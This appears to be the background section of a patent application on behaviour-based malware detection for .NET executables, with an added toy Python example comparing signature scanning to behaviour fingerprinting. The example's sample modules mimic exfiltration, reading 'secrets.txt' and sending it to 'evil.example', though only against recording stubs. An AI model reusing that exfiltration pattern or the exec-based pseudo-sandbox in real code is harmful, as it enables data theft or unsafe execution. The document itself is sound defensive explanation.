As more and more computers are interconnected through various networks, such as the Internet, computer security becomes increasingly important. In particular, computer security in regard to external attacks from malware has become, and continues to become, a pressing concern. Malware, for purposes of the present discussion, is defined as executable modules representing unwanted computer attacks. As such, malware includes, but is not limited to, computer viruses, Trojan horses, worms, denial of service attacks, abuse/misuse of legitimate computer system functions, and the like. The primary defense against malware is anti-virus software.
FIGS. 1A and 1B are pictorial diagrams illustrating how anti-virus software currently operates. In particular, FIG. 1A illustrates how anti-virus software detects known malware and prevents the known malware from reaching and infecting a computer. Conversely, FIG. 1B illustrates a common weakness of anti-virus software, particularly, how anti-virus software is unable to detect and prevent modified malware from reaching and infecting the computer. What is meant by “reaching” the computer is getting past the anti-virus software. Those skilled in the art will readily recognize that anti-virus software almost always resides on the computer it is protecting, and operates on incoming data as it physically arrives at the computer. Thus, while incoming data, including malware, may be located at the computer, for purposes of the present invention, the incoming data does not actually “reach” the computer until it gets past the anti-virus software.
As shown in FIG. 1A, malware 102 is directed over a network 106 to the computer 110, as indicated by arrow 108. It will be appreciated that the malware 102 may be directed to the computer 110 as a result of a request initiated by the computer, or directed to the computer from another network device. However, as mentioned above, before the known malware 102 reaches the computer 110, anti-virus software 104 installed on the computer intercepts the malware and examines it. As is known in the art, current anti-virus software scans the incoming data, typically as a file, searching for identifiable byte patterns, also referred to as signatures, that have been extracted from known malware. If a malware signature is located in a file, the anti-virus software 104 takes appropriate action, such as deleting the known malware/infected file, or removing the malware-infected portion from the infected file, sometimes referred to as cleaning the file. In this manner, anti-virus software 104 is able to prevent the known malware 102 from infecting the computer 110, as indicated by the arrow 112.
Those skilled in the art will appreciate that almost all unknown malware is actually a rewrite or reorganization of previously released malware. Indeed, encountering absolutely novel malware is relatively rare, as most “new” malware is a rewrite or rehash of existing malware. Malware source code is readily available, and it is a simple task for a malicious party to change variable names, reorder lines of code, or otherwise superficially modify the malware.
The result of rehashing or rewriting existing malware is that the static appearance of the malware is altered, even though the functionality of the malware remains the same. As mentioned, current anti-virus software detects only known malware, that is, malware for which a signature already exists. Thus “new” malware, while functionally identical to its original/parent malware, is neither detected nor stopped by the installed anti-virus software 104 employing the signature-matching approach.
FIG. 1B is a pictorial diagram illustrating how current anti-virus software is unable to prevent modified malware from reaching a computer. As shown in FIG. 1B, known malware 102 undergoes a modification process 114, such as a rehash or rewrite, resulting in modified malware 116. As mentioned above, the modified malware 116 will most likely have a different static appearance, though its functionality will likely be identical. As also mentioned above, because the static appearance is modified, the modified malware 116 is not “known” malware recognized by the anti-virus software 104.
The modified malware 116 is directed through the network 106 to the computer 110, as indicated by arrow 118. The anti-virus software 104 attempts to identify the modified malware 116 to determine whether it is known malware and should be stopped. As the modified malware 116 is, as yet, an unknown modification, and because the signature of the modified malware is not the same as the original malware 102, the anti-virus software 104 fails to identify the modified malware as malware, and permits it to “reach” the computer 110, as indicated by arrow 120. Upon reaching the computer 110, the modified malware 116 will typically perform its intended, destructive purpose.
It is only after an anti-virus software provider identifies a signature pattern for the modified malware 116, and then updates the anti-virus software 104, that the anti-virus software can protect the computer 110 from the modified malware 116. Clearly, this delay leaves anti-virus software users exposed to new malware. Additionally, constantly evaluating unknown malware to determine a static signature and then updating anti-virus software with that signature is a costly process, for which users ultimately pay. It is also inefficient, especially when considering that most malware is only superficially modified from other, known malware. Thus, it would be beneficial if malware could be identified, not just by its static signature, but also by its exhibited behaviors. However, the only way to currently evaluate the exhibited behavior of malware is to somehow permit it to execute on a computer 110. Of course, this would be entirely unacceptable, as the malware would perform its ill-intended effects on the computer 110 during its execution.
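The following is an added example, not code from the present application or from any anti-virus product, illustrating the contrast drawn above. Two constructed toy “executable modules” are shown: ORIGINAL and a MODIFIED variant that only renames variables and reorders two assignments. A signature scanner using a whole-file hash and a byte pattern taken from ORIGINAL recognizes ORIGINAL but not MODIFIED, whereas a behaviour fingerprint built from the ordered trace of API calls is identical for both. The “APIs” (read_file, send), the sample programs and the signature database are all assumptions constructed for the example; executing the sample against stub functions stands in for the secure behaviour-gathering problem the text describes and is not a safe way to run real untrusted code.

```python
import hashlib
import re

# Constructed sample "executable modules" (not real malware): MODIFIED is
# ORIGINAL with variable names changed and the two assignments reordered.
# Its behaviour, the sequence of API calls it makes, is unchanged.
ORIGINAL = b'''
target = "secrets.txt"
host = "evil.example"
data = read_file(target)
send(host, data)
'''

MODIFIED = b'''
h = "evil.example"
t = "secrets.txt"
d = read_file(t)
send(h, d)
'''

# Constructed signature database for the known (ORIGINAL) sample: a
# whole-file hash plus a byte pattern lifted from its static text.
KNOWN_HASHES = {hashlib.sha256(ORIGINAL).hexdigest()}
KNOWN_PATTERNS = [re.compile(rb'data = read_file\(target\)')]


def signature_scan(module: bytes) -> bool:
    """Static check, as in FIG. 1A: match a known hash or byte pattern."""
    if hashlib.sha256(module).hexdigest() in KNOWN_HASHES:
        return True
    return any(p.search(module) for p in KNOWN_PATTERNS)


def exhibited_behavior(module: bytes) -> list:
    """Run the toy module against stub 'APIs' that only record their calls.

    The stubs replace the file and network functions the sample expects, so
    no real file or socket is touched. Caveat: exec() with an emptied
    __builtins__ is a convenience for this toy, not a security boundary.
    """
    trace = []

    def read_file(path):
        trace.append(("read_file", path))
        return "<contents of %s>" % path

    def send(host, payload):
        trace.append(("send", host, payload))
        return len(payload)

    sandbox = {"__builtins__": {}, "read_file": read_file, "send": send}
    exec(module.decode(), sandbox)
    return trace


def behavior_fingerprint(module: bytes) -> str:
    """Hash of the ordered API-call trace; independent of static appearance."""
    return hashlib.sha256(repr(exhibited_behavior(module)).encode()).hexdigest()


# The behaviour "database" holds only the fingerprint of the known sample.
KNOWN_BEHAVIORS = {behavior_fingerprint(ORIGINAL)}


def behavior_scan(module: bytes) -> bool:
    """Behavioural check: does the module act like known malware?"""
    return behavior_fingerprint(module) in KNOWN_BEHAVIORS


if __name__ == "__main__":
    for name, mod in (("original", ORIGINAL), ("modified", MODIFIED)):
        print(name, "signature:", signature_scan(mod),
              "behavior:", behavior_scan(mod))
```

Run stand-alone, the script reports that the signature check catches only ORIGINAL while the behaviour check catches both. The trace is what a behaviour-gathering component would have to produce for a real module, which is exactly the part that cannot be done by simply executing the module on the protected computer.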
Recent advances in malware detection address the problem of detecting malware according to its exhibited behaviors. In particular, a system and method for determining whether an executable module is malware according to its exhibited behavior is set forth in co-pending and commonly-assigned U.S. patent application Ser. No. 10/769,038, filed Jan. 30, 2004, published Aug. 25, 2005, as US-2005/0188272-A1, entitled “System and Method for Determining Whether an Executable Module is Malware According to Its Exhibited Behavior”, which is incorporated herein by reference. However, while the above-identified patent application presents a system and method for evaluating whether an executable module is malware according to its exhibited behaviors, the problem remains of how to gather the exhibited behaviors in a secure manner. Additionally, there are many types of executable modules, including, but not limited to, compiled executable modules, such as Microsoft Corporation's Windows XP executable modules, and interpreted executable modules, such as Microsoft Corporation's .NET executable modules.
In light of the above-identified problems, and in further light of the co-pending, commonly assigned patent application, what is needed is a system and method for gathering the exhibited behaviors of a Microsoft Corporation .NET executable module. The present invention addresses this and other issues found in the prior art.